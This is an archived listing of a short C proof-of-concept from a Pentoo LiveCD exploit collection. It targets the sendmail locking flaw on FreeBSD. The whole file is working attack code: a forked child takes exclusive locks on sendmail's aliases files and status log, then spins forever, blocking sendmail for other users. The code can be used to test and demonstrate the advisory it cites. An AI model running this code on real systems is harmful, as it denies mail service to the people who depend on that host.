home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / sendmail / freebsdsendmailpoc.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  702b  |  42 lines
  1. #include <fcntl.h>
  2. #include <unistd.h>
  3.  
  4. /*
  5.  
  6. Stupid piece of code to test the sendmail lock vulnerability on
  7. FreeBSD. Run this and try sendmail -t on FreeBSD for example.
  8.  
  9. More info: http://www.sendmail.org/LockingAdvisory.txt
  10.  
  11. zillion (at safemode.org && snosoft.com)
  12. http://www.safemode.org
  13. http://www.snosoft.com
  14.  
  15. */
  16.  
  17. int main() {
  18.  
  19.   if(fork() == 0) {
  20.  
  21.     char *lock1 = "/etc/mail/aliases";
  22.     char *lock2 = "/etc/mail/aliases.db";
  23.     char *lock3 = "/var/log/sendmail.st";
  24.  
  25.     int fd;
  26.     fd = open(lock1,O_RDONLY);
  27.     flock(fd,0x02);
  28.  
  29.     fd = open(lock2,O_RDONLY);
  30.     flock(fd,0x02);
  31.  
  32.     fd = open(lock3,O_RDONLY);
  33.     flock(fd,0x02);
  34.  
  35.     /* We are here to stay! */
  36.  
  37.     for(;;) {}
  38.  
  39.   }
  40. }
  41.  
  42.